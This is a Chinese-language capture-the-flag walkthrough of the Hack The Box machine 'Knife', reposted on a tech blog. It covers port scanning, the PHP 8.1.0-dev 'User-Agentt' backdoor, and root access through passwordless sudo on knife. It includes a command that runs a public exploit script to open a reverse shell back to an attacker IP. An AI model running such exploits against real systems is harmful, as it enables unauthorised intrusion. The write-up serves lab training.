目录

Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

复制代码
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
脑斧猴1 小时前
Linux中进程
linux·服务器·c++
Brandon汐1 小时前
Linux文件传输:让数据飞起来!
linux·运维·网络
计算机鬼才~1 小时前
网络安全·第二天·ARP协议安全分析
网络·安全·web安全·arp
tan180°1 小时前
Linux自行实现的一个Shell(15)
linux·服务器·c++·后端·vim
扫地僧0092 小时前
大模型在网络安全领域的七大应用
人工智能·安全·web安全·自动化·大模型·deepseek·微调参数
开发小能手-roy2 小时前
linux Ubuntu 用户权限设置
linux·运维·ubuntu
小白探索世界欧耶!~3 小时前
【踩坑】GitHub Actions 运行的 Linux 环境中,文件名是大小写敏感的
linux·运维·服务器·前端·vue.js·笔记·github
lyingcloud3 小时前
debian系统中文输入法失效解决
linux·运维·debian
michaelzhouh3 小时前
php调用大模型应用接口实现流式输出以及数据过滤
开发语言·php·php调用大模型api流式输出
whoarethenext3 小时前
基于libevent写一个服务器(附带源码)
linux·运维·服务器·c++·后端